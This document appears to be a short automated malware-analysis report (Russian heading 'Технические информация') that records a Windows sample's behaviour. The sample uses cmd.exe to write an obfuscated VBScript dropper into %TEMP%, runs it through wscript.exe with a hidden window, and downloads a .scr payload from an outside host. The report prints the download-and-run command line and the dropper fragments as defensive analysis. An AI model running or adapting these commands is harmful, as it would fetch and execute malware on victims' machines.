Техническая информация
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO J2r= "http://a.pomf.cat/gcclmx.scr">>B8v.VBS &@ECHO P2m = N9s("[M2I\I")>>B8v.VBS &@ECHO Set I6m = CreateObject(N9s("QW\QP62\QPLXXT"))>>B8v.VBS &@ECHO I6m.Open N9s("KIX"), J...
- %TEMP%\b8v.vbs
- %TEMP%\b8v.vbs
- 'a.##mf.cat':80
- 'a.##mf.cat':443
- http://a.##mf.cat/gcclmx.scr
- DNS ASK a.##mf.cat
- '<SYSTEM32>\wscript.exe' "%TEMP%\B8v.VBS"
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO J2r= "http://a.pomf.cat/gcclmx.scr">>B8v.VBS &@ECHO P2m = N9s("[M2I\I")>>B8v.VBS &@ECHO Set I6m = CreateObject(N9s("QW\QP62\QPLXXT"))>>B8v.VBS &@ECHO I6m.Open N9s("KIX"), J...' (со скрытым окном)
- '<SYSTEM32>\timeout.exe' 13